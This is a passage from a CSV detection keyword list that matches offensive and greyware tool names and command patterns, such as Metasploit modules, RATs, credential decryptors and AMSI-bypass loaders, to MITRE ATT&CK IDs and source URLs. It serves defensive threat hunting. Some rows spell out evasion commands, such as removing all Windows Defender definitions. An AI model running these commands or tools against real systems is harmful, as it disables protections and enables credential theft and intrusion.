!","10","10","N/A","N/A","N/A","N/A" +"*MpCmdRun.exe* -RemoveDefinitions -All*","offensive_tool_keyword","MpCmdRun","Removing all the signature from windows defender - used by a metasploit module","T1562.001","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*mpgn/BackupOperatorToDA*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","1","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*mqtt_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*mr.un1k0d3r@gmail.com*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" +"*Mr-B0b/SpaceRunner*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"*Mr-Cyb3rgh0st/Excel-Exploit*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" +"*mrd0x/BITB*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*mremoteng_decrypt.py*","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","111","39","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" +"*mRemoteNG-local.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*MrEmpy/Reaper*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*Mr-Un1k0d3r*","offensive_tool_keyword","Github Username","github username Mostly Red Team tools for penetration testing. Twitter - @MrUn1k0d3r","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Mr-Un1k0d3r","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*ms_teams_exports_usernev_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*ms04_007_killbill.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ms14-068.py -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ms14-068.py -u*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*ms14-068_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ms17_010_eternalblue*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ms17_010_eternalblue.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ms17_010_psexec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ms17_010_psexec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MS17-010*","offensive_tool_keyword","POC","MS17-010 poc github repos","T1204.002","TA0002","N/A","N/A","Exploitation tools","https://github.com/worawit/MS17-010","1","0","N/A","N/A","10","2049","1127","2023-06-20T08:27:19Z","2017-06-19T16:47:31Z" +"*ms17-010_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*MSBuild.exe NetLoader.xml*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" +"*MSBuildShell*","offensive_tool_keyword","MSBuildShell","a Powershell Host running within MSBuild.exe This code lets you Bypass Application Whitelisting and Powershell.exe restrictions and gives you a shell that almost looks and feels like a normal Powershell session (Get-Credential. PSSessions -> Works. Tab Completion -> Unfortunately not). It will also bypass the Antimalware Scan Interface (AMSI). which provides enhanced malware protection for Powershell scripts","T1027 - T1086 - T1059 - T1064 - T1089","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/MSBuildShell","1","1","N/A","N/A","3","274","81","2019-08-02T06:46:52Z","2016-11-11T18:52:38Z" +"*MScholtes/PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*msedge* --headless * --dump-dom http*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - downloading a file - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://redcanary.com/blog/intelligence-insights-june-2023/","1","0","N/A","4","5","N/A","N/A","N/A","N/A" +"*msedge* --headless --disable-gpu --remote-debugging-port=*","greyware_tool_keyword","chromium","Headless Chromium allows running Chromium in a headless/server environment - abused by attackers","T1553.002 - T1059.005 - T1071.001 - T1561","TA0002","N/A","N/A","Defense Evasion","https://www.splunk.com/en_us/blog/security/mockbin-and-the-art-of-deception-tracing-adversaries-going-headless-and-mocking-apis.html","1","1","N/A","5","10","N/A","N/A","N/A","N/A" +"*msedge.exe* --load-extension=""*\Users\*\Appdata\Local\Temp\*","greyware_tool_keyword","chromium","The --load-extension switch allows the source to specify a target directory to load as an extension. This gives malware the opportunity to start a new browser window with their malicious extension loaded.","T1136.001 - T1176 - T1059.007","TA0003 - TA0004 - TA0005","N/A","N/A","Exploitation tools","https://www.mandiant.com/resources/blog/lnk-between-browsers","1","0","risk of false positives","7","10","N/A","N/A","N/A","N/A" +"*msf_api_doc.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf_cve_extracter.py*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" +"*msf_exec.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf_matchers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf_payload.ps1*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" +"*msf-auxiliarys*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*msfconsole *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfconsole.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfconsole_spec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfcrawler.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfd.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb --component*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb --use-defaults*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfdb_helpers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfencode*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msfJavaToolkit*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf-json-rpc.*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*msf-json-rpc.ru*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msflag.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MsfModule*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*msfmodule.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*MsfModuleAsFunction*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - 